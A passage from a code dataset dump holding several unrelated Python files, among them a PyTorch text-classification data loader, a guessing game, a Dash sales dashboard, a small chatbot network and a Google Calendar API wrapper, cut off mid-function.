sentence\n mask += [1] * (length + 1) # +1 for [SEP]\n\n assert len(token_idxs) == len(token_type_idxs) and len(token_idxs) == len(mask) and len(mask) <= max_seq_len\n\n return token_idxs, token_type_idxs, mask\n\n\nclass Dataset(): \n\n def __init__(self, train_file, dev_file, test_file, word_to_idx, max_seq_len=512, use_gpu=False):\n # word_to_idx: function, whose input is a string and output an int\n\n self.use_gpu = use_gpu\n self.max_seq_len = max_seq_len\n self.num_classes = 2\n\n self.train_file = train_file\n self.dev_file = dev_file\n self.test_file = test_file\n\n self.word_to_idx = word_to_idx\n\n self.num_train_samples = 0\n for batch in self.trainset(batch_size=1000):\n self.num_train_samples += batch.input[0].shape[0]\n\n self.num_dev_samples = 0\n for batch in self.devset(batch_size=1000):\n self.num_dev_samples += batch.input[0].shape[0]\n\n self.num_test_samples = 0\n for batch in self.testset(batch_size=1000):\n self.num_test_samples += batch.input[0].shape[0]\n\n def trainset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.train_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n \n def devset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.dev_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def testset(self, batch_size=1, drop_last=False):\n for batch in self.sample_batches(self.test_file, batch_size=batch_size, drop_last=drop_last):\n yield batch\n\n def pad_sequence(self, s):\n return nn.utils.rnn.pad_sequence(s, batch_first=True)\n\n def samples(self, file_path):\n\n with open(file_path, 'r') as f:\n\n labels = f.readline().strip().split('\\t') # Omit tsv header\n\n for line in f:\n tag, sent = line.strip().split('\\t')\n # print (tag, sent)\n yield sent, tag\n \n \n def sample_batches(self, file_path, batch_size=1, drop_last=False):\n # drop_last: drop the last incomplete batch if True\n cnt = 0\n\n # Input\n token_idxs_batch, token_type_idxs_batch, mask_batch = [], [], [] # (batch_size, seq_len)\n # Target\n tag_batch = [] # (batch_size)\n\n for sent, tag in self.samples(file_path):\n # all string-like\n\n # bert-like processing\n token_idxs, token_type_idxs, mask = parse_sentence(sent, self.word_to_idx, self.max_seq_len) # (seq_len)\n\n token_idxs = torch.LongTensor(token_idxs)\n token_type_idxs = torch.LongTensor(token_type_idxs)\n mask = torch.LongTensor(mask)\n tag = torch.LongTensor([int(tag)])\n\n if self.use_gpu:\n token_idxs, token_type_idxs, mask, tag = token_idxs.cuda(), token_type_idxs.cuda(), mask.cuda(), tag.cuda()\n\n token_idxs_batch.append(token_idxs)\n token_type_idxs_batch.append(token_type_idxs)\n mask_batch.append(mask)\n tag_batch.append(tag)\n\n cnt += 1\n\n if cnt >= batch_size:\n\n yield Batch(input=(self.pad_sequence(token_idxs_batch), \n self.pad_sequence(token_type_idxs_batch), \n self.pad_sequence(mask_batch)), \n target=torch.cat(tag_batch))\n\n token_idxs_batch, token_type_idxs_batch, mask_batch, tag_batch = [], [], [], []\n cnt = 0\n\n if cnt > 0 and not drop_last:\n yield Batch(input=(self.pad_sequence(token_idxs_batch), \n self.pad_sequence(token_type_idxs_batch), \n self.pad_sequence(mask_batch)), \n target=torch.cat(tag_batch))\n\nif __name__ == '__main__': \n # Usage\n train_file = 'train.tsv'\n dev_file = 'dev.tsv'\n test_file = 'test.tsv'\n\n def word_to_idx(w):\n w2i = {'当': 1, '希': 2}\n return w2i.get(w, 0)\n\n dataset = Dataset(train_file=train_file, dev_file=dev_file, test_file=test_file, word_to_idx=word_to_idx)\n\n print (f'trainset: {dataset.num_train_samples}')\n print (f'devset: {dataset.num_dev_samples}')\n print (f'testset: {dataset.num_test_samples}')\n\n cnt = 0\n for (token_idxs_batch, token_type_idxs_batch, mask_batch), tag_batch in dataset.trainset(batch_size=10, drop_last=False):\n # print (f'input_batch: {token_idxs_batch.shape, token_type_idxs_batch.shape, mask_batch.shape}, target_batch: {tag_batch.shape}')\n # print (token_idxs_batch)\n # input ()\n cnt += tag_batch.shape[0]\n print (f'trainset: {cnt}')\n \n cnt = 0\n for (token_idxs_batch, token_type_idxs_batch, mask_batch), tag_batch in dataset.devset(batch_size=10, drop_last=False):\n # print (f'input_batch: {token_idxs_batch.shape, token_type_idxs_batch.shape, mask_batch.shape}, target_batch: {tag_batch.shape}')\n # input ()\n cnt += tag_batch.shape[0]\n print (f'devset: {cnt}')\n\n cnt = 0\n for (token_idxs_batch, token_type_idxs_batch, mask_batch), tag_batch in dataset.testset(batch_size=10, drop_last=False):\n # print (f'input_batch: {token_idxs_batch.shape, token_type_idxs_batch.shape, mask_batch.shape}, target_batch: {tag_batch.shape}')\n # input ()\n cnt += tag_batch.shape[0]\n print (f'testset: {cnt}')\n \n\n","repo_name":"Hongqin-Li/NTFS","sub_path":"data/chnsenticorp/dataset_bert.py","file_name":"dataset_bert.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28170583144","text":"def secret_number():\n import random\n goalnumber = random.randint(1, 50)\n numberoftries = 0\n while True:\n chosennumber = int(input(\"What number (from 1-50) would you like to choose? \"))\n if chosennumber > 50 or chosennumber < 1:\n print(\"Invalid option, try again\")\n elif chosennumber == goalnumber:\n print(\"That's the number, you win!\")\n numberoftries += 1\n break\n elif chosennumber < goalnumber:\n print(\"That number is too low\")\n numberoftries += 1\n else:\n print(\"That number is too high\")\n numberoftries += 1\n tryword = \"try\" if numberoftries == 1 else \"tries\"\n print(\"\\nIt took you\",numberoftries,tryword,\"to guess the number\")\n\n # Version WITH recursion\nimport random\n\ndef secret_number2(goal, tries):\n chosennumber = int(input(\"What number (from 1-50) would you like to choose? \"))\n won = False\n if chosennumber > 50 or chosennumber < 1:\n print(\"Invalid option, try again\")\n elif chosennumber == goal:\n print(\"That's the number, you win!\")\n tries += 1\n won = True\n elif chosennumber < goal:\n print(\"That number is too low\")\n tries += 1\n else:\n print(\"That number is too high\")\n tries += 1\n if won:\n tryword = \"try\" if tries == 1 else \"tries\"\n print(\"\\nIt took you\",tries,tryword,\"to guess the number\")\n else:\n secret_number2(goal, tries)\n\nsecret_number2(random.randint(1, 50), 0)\n","repo_name":"JustineTang10/python-class","sub_path":"1-10-2021.py","file_name":"1-10-2021.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37351792375","text":"import os\nimport random\nimport logging\n\nimport torch\nimport numpy as np\nfrom seqeval.metrics import precision_score, recall_score, f1_score\nfrom sklearn.metrics import classification_report\n\nfrom transformers import BertConfig, DistilBertConfig, AlbertConfig\nfrom transformers import BertTokenizer, DistilBertTokenizer, AlbertTokenizer\n\n\ndef get_labels(label_file):\n return [label.strip() for label in open(label_file, 'r', encoding='utf-8')]\n\n\ndef init_logger():\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\n\n\ndef set_seed(args):\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if not args.no_cuda and torch.cuda.is_available():\n torch.cuda.manual_seed_all(args.seed)\n\n\ndef compute_metrics(intent_preds, intent_labels):\n assert len(intent_preds) == len(intent_labels)\n results = {}\n classification_report_dict = classification_report(intent_preds, intent_labels, output_dict=True)\n for key0, val0 in classification_report_dict.items():\n if isinstance(val0, dict):\n for key1, val1 in val0.items():\n results[key0 + \"__\" + key1] = val1\n\n else:\n results[key0] = val0\n return results\n\n\ndef read_prediction_text(args):\n return [text.strip() for text in open(os.path.join(args.pred_dir, args.pred_input_file), 'r', encoding='utf-8')]\n","repo_name":"Coding-Zuo/DaguanFengxian","sub_path":"baseline2/training/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"41941502840","text":"import torch\nfrom infrastructure.words import bag_of_words, tokenize\n\n\nclass NeuralNet(torch.nn.Module):\n\n def __init__(self, data, device):\n super(NeuralNet, self).__init__()\n self.data = data\n self.l1 = torch.nn.Linear(data['input_size'], data['hidden_size'])\n self.l2 = torch.nn.Linear(data['hidden_size'], data['hidden_size'])\n self.l3 = torch.nn.Linear(data['hidden_size'], data['output_size'])\n self.relu = torch.nn.ReLU()\n self.device = device\n self.to(device)\n\n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n out = self.relu(out)\n out = self.l3(out)\n return out\n\n def find_probability(self, query_question):\n sentence_ = tokenize(query_question)\n X = bag_of_words(sentence_, self.data['all_words'])\n X = X.reshape(1, X.shape[0])\n X = torch.from_numpy(X).to(self.device)\n\n output = self(X)\n _, predicted = torch.max(output, dim=1)\n\n probabilities = torch.softmax(output, dim=1)\n return probabilities, predicted\n\n","repo_name":"naspredam/simple-chat-bot","sub_path":"engine/application/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7028065286","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport numpy as np\nfrom dash.dependencies import Input, Output, State\n\nimport plotly.graph_objs as go\nimport plotly.express as px\n\nimport pandas as pd\n\nfrom fileReader import *\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\n# tab标签的css\ntabs_styles = {'height': '44px'}\ntab_style = {\n 'borderBottom': '1px solid #d6d6d6',\n 'padding': '6px',\n 'fontWeight': 'bold'\n}\ntab_selected_style = {\n 'borderTop': '1px solid #d6d6d6',\n 'borderBottom': '1px solid #d6d6d6',\n 'backgroundColor': '#119DFF',\n 'color': 'white',\n 'padding': '6px'\n}\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ndf = pd.read_csv(\"dataset/black-friday/BlackFriday.csv\")\n\nfile = read_file()\n\n# 获取商品分类\nproduct_category_1, product_category_2, product_category_3 = get_product_category_1()\n\n# 界面\napp.layout = html.Div([\n html.Div([\n html.Div([\n html.Div([\n html.Label(\"Product Category1\"),\n dcc.Dropdown(\n id=\"category_1\",\n options=[{\n \"label\": i,\n \"value\": i\n } for i in product_category_1],\n value=\"All\",\n ),\n html.Label(\"Product Category2\"),\n dcc.Dropdown(\n id=\"category_2\",\n ),\n html.Label(\"Product Category3\"),\n dcc.Dropdown(\n id=\"category_3\",\n ),\n ],\n style={\n # \"border\": \"2px black solid\"\n }),\n # 散点图\n dcc.Graph(\n id='sale-price-scatter-plot',\n )\n ],\n style={\n \"width\": \"49%\",\n \"display\": \"inline-block\",\n }),\n html.Div([\n # 柱状图\n html.Div([\n dcc.Graph(\n id='age-sex-purchase-bar-chart'\n )\n ]),\n dcc.Tabs(\n id=\"tabs\",\n style=tabs_styles,\n children=[\n # tab1\n dcc.Tab(\n label=\"Purchase in black five of all ages\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div([\n dcc.Graph(\n id='age-purchase-pie-chart',\n animate=True\n ),\n ]),\n ]\n ),\n # tab2\n dcc.Tab(\n label=\"Residence time and purchase of each city\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div([\n # 折线图\n dcc.Graph(\n id='city-live-sale-line-chart'\n )\n ])\n ]\n )\n ]\n )\n ],\n style={\n \"width\": \"49%\",\n \"float\": \"right\",\n \"display\": \"inline-block\"\n })\n ])\n])\n\napp.title = \"Black-Friday\"\n\n\n# 折线图\n@app.callback(\n Output('city-live-sale-line-chart', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n Input('category_3', 'value')\n)\ndef update_city_live_sale_line_chart(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n sales = get_line_char(new_file)\n\n cities_for_line_chart = []\n\n for i in range(len(cities)):\n for j in range(len(stay_in_current_city_years)):\n cities_for_line_chart.append(cities[i])\n\n line_df = pd.DataFrame({\n \"Sales\": sales,\n \"LiveYears\": stay_in_current_city_years * len(cities),\n \"Cities\": cities_for_line_chart,\n })\n\n line_fig = px.line(line_df, x='LiveYears', y='Sales', color='Cities', title=\"city-live-time-sale-line-chart\")\n\n return line_fig\n\n\n# 散点图\n@app.callback(\n Output('sale-price-scatter-plot', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n Input('category_3', 'value')\n)\ndef update_sale_price_scatter_plot(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n [product_id, product_sales, product_price, product_total, product_category] = get_sales_price(new_file)\n\n scatter_df = pd.DataFrame({\n \"ProductId\": product_id,\n \"ProductSales\": product_sales,\n \"ProductPrice\": product_price,\n \"ProductTotal\": product_total,\n \"ProductCategory\": product_category,\n })\n\n scatter_fig = px.scatter(scatter_df, x=\"ProductSales\", y=\"ProductPrice\",\n size=\"ProductTotal\", color=\"ProductCategory\", hover_name=\"ProductId\",\n title=\"sale-price-scatter-plot\",\n log_x=True, size_max=60, height=750)\n return scatter_fig\n\n\n# 柱状图\n@app.callback(\n Output('age-sex-purchase-bar-chart', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n Input('category_3', 'value')\n)\ndef update_age_sex_purchase_bar_chart(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n [x, y] = get_age_sex_purchase(new_file)\n\n sex = []\n\n for i in range(len(content_age_category) * 2):\n if i < 7:\n sex.append('M')\n else:\n sex.append('F')\n\n bar_df = pd.DataFrame({\n \"Age\": content_age_category + content_age_category,\n \"Purchase\": x + y,\n \"Sex\": sex\n })\n\n bar_fig = px.bar(bar_df, x=\"Age\", y=\"Purchase\", color=\"Sex\", barmode=\"group\", title=\"age-sex-purchase-bar-chart\")\n\n return bar_fig\n\n\n# 饼状图\n@app.callback(\n Output('age-purchase-pie-chart', 'figure'),\n Input('category_1', 'value'),\n Input('category_2', 'value'),\n Input('category_3', 'value')\n)\ndef update_age_purchase_pie_chart(category_1, category_2, category_3):\n new_file = read_file()\n new_file = file_filter(new_file, category_1, category_2, category_3)\n\n [content_purchase_list] = get_age_purchase(new_file)\n\n # print([content_age_category, content_purchase_list])\n\n pie_df = pd.DataFrame({\n \"Labels\": content_age_category,\n \"Purchase\": content_purchase_list,\n })\n\n pie_fig = px.pie(pie_df, names=\"Labels\", values=\"Purchase\", title=\"age-purchase-pie-chart\")\n\n return pie_fig\n\n\n# 设置category2\n@app.callback(\n Output('category_2', 'options'),\n Input('category_1', 'value'))\ndef set_category_2_options(category_1):\n if category_1 == \"All\":\n return [{\"label\": \"All\", \"value\": \"All\"}]\n return [{'label': i, 'value': i} for i in product_category_2[int(category_1)]]\n\n\n@app.callback(\n Output('category_2', 'value'),\n Input('category_2', 'options'))\ndef set_category_2_value(available_options):\n return available_options[0]['value']\n\n\n# 设置category3\n@app.callback(\n Output('category_3', 'options'),\n Input('category_1', 'value'),\n Input('category_2', 'value'))\ndef set_category_3_options(category_1, category_2):\n if category_1 == \"All\" or category_2 == \"All\":\n return [{\"label\": \"All\", \"value\": \"All\"}]\n return [{'label': i, 'value': i} for i in product_category_3[int(category_2)]]\n\n\n@app.callback(\n Output('category_3', 'value'),\n Input('category_3', 'options'))\ndef set_category_3_value(available_options):\n return available_options[0]['value']\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"matianfang1998/Human-Computer-Interaction","sub_path":"lab3-data-visualization/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"416066902","text":"#-------------Desafio 18-------------------------#\r\n#faça um programa que leia um angulo qualquer e mostre na tela o valor do seno, cosseno, e tangente desse angulo.\r\nimport math #importanto bliblioteca math\r\nang = float(input('Digite o angulo que deseja saber o seno / cosseno / tangente: '))#variavel ang atribuida com classe primitiva float \r\nang1 = math.radians(ang)#variavel criada atribuindo classe math.radians sobre a variavel ang\r\nseno = math.sin(ang1)#variavel criada atribuindo class math.sin sobre a variavel ang\r\ncose = math.cos(ang1)#variavel criada atribuindo classe math.cos sobre a variavel ang\r\ntang = math.tan(ang1)#variavel criada atribuindo classe math.tan sobre a variavel ang\r\nprint('>'*50)\r\nprint('Com o angulo {}°,\\nO seno é {:.2f},\\nO cosseno é{:.2f}\\nE a tangente é{:.2f}'.format(ang, seno, cose, tang))#print para informar valores propostos nas variaveis \r\nprint('>'*50)\r\n#----------------------------------------------------------------\r\n","repo_name":"rickicr-collab/curso-Python-Desafios-","sub_path":"desafio18.py","file_name":"desafio18.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25669932245","text":"#!/usr/bin/python\n# encoding: utf-8\n\"\"\"\ngcalendar.py\nGoogle Calendar functionality.\n\nCreated by Shane O'Connor 2014\n\"\"\"\n\nif __name__ == '__main__':\n import sys\n sys.path.insert(0, '../..')\n\nimport pprint\nimport copy\nimport time\nimport traceback\nimport json\nimport httplib2\nfrom datetime import datetime, timedelta, date\nimport dateutil.parser\n\nimport pytz\nfrom apiclient.discovery import build\nfrom oauth2client.client import SignedJwtAssertionCredentials\n\nfrom klab.general.structures import NestedBunch, NonStrictNestedBunch, DeepNonStrictNestedBunch\nfrom klab.fs.fsio import read_file\nfrom klab import colortext\nfrom .gauth import OAuthCredentials\n\nclass BasicEvent(object):\n\n def __init__(self, calendar_object, start_dt, end_dt, location = None, summary = None, description = None, visibility = 'default', email_map = {}, username_map = {}):\n '''start_dt should be a datetime.date object for all-day events or a datetime.datetime object for ranged events. Similarly for end_dt.' \\\n '''\n e = {}\n self.timezone_string = calendar_object.timezone_string\n assert(visibility == 'default' or visibility == 'public' or visibility == 'private' or visibility == 'confidential')\n if isinstance(start_dt, date):\n e['start'] = {'date' : start_dt.isoformat(), 'timeZone' : self.timezone_string}\n else:\n assert(isinstance(start_dt, datetime))\n e['start'] = {'dateTime' : start_dt.isoformat(), 'timeZone' : self.timezone_string}\n if isinstance(end_dt, date):\n e['end'] = {'date' : end_dt.isoformat(), 'timeZone' : self.timezone_string}\n else:\n assert(isinstance(end_dt, datetime))\n e['end'] = {'dateTime' : end_dt.isoformat(), 'timeZone' : self.timezone_string}\n e['summary'] = summary\n e['description'] = description or summary\n e['location'] = location\n e['status'] = 'confirmed'\n self.email_map = email_map\n self.username_map = username_map\n self.event = e\n\n def initialize_tagged_copy(self):\n e = copy.deepcopy(self.event)\n e['extendedProperties'] = e.get('extendedProperties', {})\n e['extendedProperties']['shared'] = e['extendedProperties'].get('shared', {})\n assert(not(e['extendedProperties']['shared'].get('event_type')))\n return e\n\n\n # Main calendar\n\n\n def create_lab_meeting(self, event_type, presenters, foodie = None, locked = False):\n 'Presenters can be a comma-separated list of presenters.'\n e = self.initialize_tagged_copy()\n summary_texts = {\n 'Lab meeting' : 'Kortemme Lab meeting',\n 'Kortemme/DeGrado joint meeting' : 'DeGrado/Kortemme labs joint meeting'\n }\n assert(summary_texts.get(event_type))\n e['extendedProperties']['shared']['event_type'] = event_type\n e['extendedProperties']['shared']['Presenters'] = presenters\n e['extendedProperties']['shared']['Food'] = foodie\n e['extendedProperties']['shared']['Locked meeting'] = locked\n print(presenters)\n print([[p for p in presenters.split(',')] + [foodie]])\n participants = [p.strip() for p in ([p for p in presenters.split(',')] + [foodie]) if p and p.strip()]\n participants = [p for p in [self.email_map.get(p) for p in participants] if p]\n participant_names = [self.username_map.get(p.strip(), p.strip()) for p in presenters.split(',') if p.strip()]\n if participants:\n e['extendedProperties']['shared']['ParticipantList'] = ','.join(participants)\n if not e['summary']:\n e['summary'] = '%s: %s' % (summary_texts[event_type], ', '.join(participant_names))\n e['description'] = e['description'] or e['summary']\n return e\n\n\n def create_journal_club_meeting(self, presenters, food_vendor, paper = None):\n 'Presenters can be a comma-separated list of presenters.'\n e = self.initialize_tagged_copy()\n e['extendedProperties']['shared']['event_type'] = 'Journal club'\n e['extendedProperties']['shared']['Presenters'] = presenters\n e['extendedProperties']['shared']['Food vendor'] = food_vendor\n e['extendedProperties']['shared']['Paper'] = paper\n participants = [p.strip() for p in [p for p in presenters.split(',')] if p and p.strip()]\n participants = [p for p in [self.email_map.get(p) for p in participants] if p]\n participant_names = [self.username_map.get(p.strip(), p.strip()) for p in presenters.split(',') if p.strip()]\n if participants:\n e['extendedProperties']['shared']['ParticipantList'] = ','.join(participants)\n if not e['summary']:\n e['summary'] = 'Journal club: %s' % (', '.join(participant_names))\n e['description'] = e['description'] or e['summary']\n return e\n\n\n # Notices calendar\n\n\n def create_birthday(self, celebrant, caker):\n e = self.initialize_tagged_copy()\n e['summary'] # overwrite summary\n e['extendedProperties']['shared']['event_type'] = 'Birthday'\n e['extendedProperties']['shared']['Celebrant'] = celebrant\n e['extendedProperties']['shared']['Bringer Of CAKE!'] = caker\n participants = [p for p in [self.email_map.get(celebrant), self.email_map.get(caker)] if p]\n if participants:\n e['extendedProperties']['shared']['ParticipantList'] = ','.join(participants)\n e['summary'] = \"%s's birthday\" % self.username_map.get(celebrant, celebrant)\n e['description'] = e['summary']\n e['gadget'] = {\n 'display' : 'icon',\n 'iconLink' : 'https://guybrush.ucsf.edu/images/cake.png',\n 'title' : e['summary'],\n }\n return e\n\n\n\n\n\nclass GoogleCalendar(object):\n ''' A class to interact with a set of Google calendars. This is used by our local lab website and by the meetings script.\n The class methods are split up following the API here:\n https://developers.google.com/resources/api-libraries/documentation/calendar/v3/python/latest/ '''\n\n\n @staticmethod\n def from_file(oauth_json_filepath, calendar_ids):\n return GoogleCalendar(read_file(oauth_json_filepath), calendar_ids)\n\n\n def __init__(self, oauth_json, calendar_ids):\n '''oauth_json is a JSON string which should contain login credentials for OAuth 2.0.\n calendar_ids is a list of calendar aliases to connect to and should be defined in oauth_json[\"calendars\"].\n We use calendar aliases e.g. \"main\" or \"biosensor meetings\" for convenience.\n '''\n oc = OAuthCredentials.from_JSON(oauth_json)\n configured_calendar_ids = NestedBunch.from_JSON(oauth_json).calendars\n for calendar_id in calendar_ids:\n assert(calendar_id in list(configured_calendar_ids.keys()))\n self.calendar_ids = calendar_ids\n\n # Request both read/write (calendar) and read-only access (calendar.readonly)\n credentials = SignedJwtAssertionCredentials(oc.client_email, oc.private_key, scope=['https://www.googleapis.com/auth/calendar', 'https://www.googleapis.com/auth/calendar.readonly'])\n http_auth = credentials.authorize(httplib2.Http())\n\n # Create a service object for the Google Calendar v3 API\n self.service = build('calendar', 'v3', http = http_auth)\n self.timezone_string = 'America/Los_Angeles'\n self.timezone = pytz.timezone(self.timezone_string)\n self.configured_calendar_ids = configured_calendar_ids\n\n\n # Access control lists (acl)\n\n\n def get_acl_list(self, calendar_id):\n return self.service.acl().list(calendarId = self.configured_calendar_ids[calendar_id]).execute() # note: not using pagination here yet\n\n def get_calendar_users(self, calendar_id):\n users = {}\n acl_list = self.get_acl_list(calendar_id)\n if acl_list:\n for item in acl_list['items']:\n nb = DeepNonStrictNestedBunch(item)\n users[nb.role]= users.get(nb.role, [])\n if nb.scope.type == 'user':\n if nb.scope.value.find('@group.calendar.google.com') == -1 and nb.scope.value.find('@developer.gserviceaccount.com') == -1:\n users[nb.role].append(nb.scope.value)\n users[nb.role] = sorted(users[nb.role])\n return DeepNonStrictNestedBunch(users)\n\n\n # Calendar list (calendarList)\n\n\n def get_calendars(self):\n calendars = []\n cl = self.service.calendarList().list().execute()\n for c in cl.get('items', []):\n nb = DeepNonStrictNestedBunch(c)\n calendars.append(nb)\n return calendars\n\n\n def get_calendar(self, calendar_id):\n return DeepNonStrictNestedBunch(self.service.calendarList().get(calendarId = self.configured_calendar_ids[calendar_id]).execute())\n\n\n # Calendar and event colors (colors)\n\n\n def get_colors(self):\n import pprint\n clrs = self.service.colors().get().execute()\n pprint.pprint(clrs)\n\n\n\n # Calendar events (events)\n\n def get_events_within_a_given_month(self, year, month, day = 1, hour = 0, minute = 0, second = 0):\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=year, month=month, day=day, hour=hour, minute=minute, second=second, tzinfo=self.timezone)\n if start_time.month == 12:\n end_time = datetime(year = start_time.year, month = 12, day = 31, hour=23, minute=59, second=59, tzinfo=self.timezone)\n else:\n end_time = datetime(year = start_time.year, month = start_time.month + 1, day = 1, hour=0, minute=0, second=0, tzinfo=self.timezone)\n end_time = end_time - timedelta(seconds = 1)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n return self.get_events(start_time, end_time)\n\n\n def get_upcoming_events_within_the_current_month(self):\n now = datetime.now(tz=self.timezone) # timezone?\n return self.get_events_within_a_given_month(now.year, now.month, day = now.day, hour = now.hour, minute = now.minute, second = now.second)\n\n\n def get_upcoming_event_lists_for_the_remainder_of_the_month(self, year = None, month = None):\n '''Return the set of events as triple of (today's events, events for the remainder of the week, events for the remainder of the month).'''\n\n events = []\n if year == None and month == None:\n now = datetime.now(tz=self.timezone) # timezone?\n else:\n now = datetime(year=year, month=month, day=1, hour=0, minute=0, second=0, tzinfo=self.timezone)\n\n # Get today's events, including past events\n start_time = datetime(year=now.year, month=now.month, day=now.day, hour=0, minute=0, second=0, tzinfo=self.timezone)\n end_time = datetime(year = start_time.year, month = start_time.month, day = start_time.day, hour=23, minute=59, second=59, tzinfo=self.timezone)\n events.append(self.get_events(start_time.isoformat(), end_time.isoformat()))\n\n # Get this week's events\n if now.weekday() < 6:\n start_time = datetime(year=now.year, month=now.month, day=now.day + 1, hour=0, minute=0, second=0, tzinfo=self.timezone)\n end_time = start_time + timedelta(days = 6 - now.weekday())\n # We do still want to return events in the next month if they fall within this week. Otherwise\n #if end_time.month != now.month:\n # end_time = end_time - timedelta(days = end_time.day)\n # end_time = datetime(year = end_time.year, month = end_time.month, day = end_time.day, hour=23, minute=59, second=59, tzinfo=self.timezone)\n #else:\n end_time = end_time + timedelta(seconds = -1)\n #end_time = datetime(year = end_time.year, month = end_time.month, day = end_time.day - 1, hour=23, minute=59, second=59, tzinfo=self.timezone)\n events.append(self.get_events(start_time.isoformat(), end_time.isoformat()))\n else:\n events.append([])\n\n # Get this remaining events in the month\n start_time = end_time + timedelta(seconds = 1)\n if start_time.month == now.month:\n if now.month == 12:\n end_time = datetime(year = start_time.year, month = 12, day = 31, hour=23, minute=59, second=59, tzinfo=self.timezone)\n else:\n end_time = datetime(year = start_time.year, month = start_time.month + 1, day = 1, hour=0, minute=0, second=0, tzinfo=self.timezone)\n end_time = end_time - timedelta(seconds = 1)\n events.append(self.get_events(start_time.isoformat(), end_time.isoformat()))\n else:\n events.append([])\n\n return events\n\n\n def get_upcoming_events_within_the_current_week(self):\n '''Returns the events from the calendar for the next days_to_look_ahead days.'''\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=now.year, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n end_time = start_time + timedelta(days = 6 - now.weekday())\n end_time = datetime(year = end_time.year, month = end_time.month, day = end_time.day, hour=23, minute=59, second=59, tzinfo=self.timezone)\n assert(end_time.weekday() == 6)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n return self.get_events(start_time, end_time)\n\n\n def get_upcoming_events_for_today(self):\n return self.get_upcoming_events(1)\n\n\n def get_upcoming_events(self, days_to_look_ahead):\n '''Returns the events from the calendar for the next days_to_look_ahead days.'''\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=now.year, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n end_time = start_time + timedelta(days = days_to_look_ahead)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n return self.get_events(start_time, end_time)\n\n\n def get_event(self, calendar_id, event_id):\n event = self.service.events().get(calendarId = self.configured_calendar_ids[calendar_id], eventId=event_id).execute()\n nb = DeepNonStrictNestedBunch(event)\n dt = None\n if nb.start.dateTime:\n dt = dateutil.parser.parse(nb.start.dateTime)\n elif nb.start.date:\n dt = dateutil.parser.parse(nb.start.date)\n dt = datetime(year = dt.year, month = dt.month, day = dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone)\n if dt:\n nb.datetime_o = dt\n nb.calendar_id = calendar_id\n return nb\n\n\n def get_events(self, start_time, end_time, ignore_cancelled = True, get_recurring_events_as_instances = True, restrict_to_calendars = []):\n '''A wrapper for events().list. Returns the events from the calendar within the specified times. Some of the interesting fields are:\n description, end, htmlLink, location, organizer, start, summary\n\n Note: \"Cancelled instances of recurring events (but not the underlying recurring event) will still be included if showDeleted and singleEvents are both False.\"\n '''\n es = []\n calendar_ids = restrict_to_calendars or self.calendar_ids\n for calendar_id in calendar_ids:\n now = datetime.now(tz = self.timezone)\n events = []\n page_token = None\n while True:\n events = self.service.events().list(pageToken=page_token, maxResults = 250, calendarId = self.configured_calendar_ids[calendar_id], timeMin = start_time, timeMax = end_time, showDeleted = False).execute()\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n assert(not(nb._event))\n nb._event = event # keep the original event as returned in case we want to reuse it e.g. insert it into another calendar\n if (not ignore_cancelled) or (nb.status != 'cancelled'):\n # Ignore cancelled events\n if nb.recurrence:\n if get_recurring_events_as_instances:\n # Retrieve all occurrences of the recurring event within the timeframe\n es += self.get_recurring_events(calendar_id, nb.id, start_time, end_time)\n else:\n es.append(nb)\n elif nb.start.dateTime:\n dt = dateutil.parser.parse(nb.start.dateTime)\n elif nb.start.date:\n dt = dateutil.parser.parse(nb.start.date)\n dt = datetime(year = dt.year, month = dt.month, day = dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone)\n if dt:\n nb.datetime_o = dt\n nb.calendar_id = 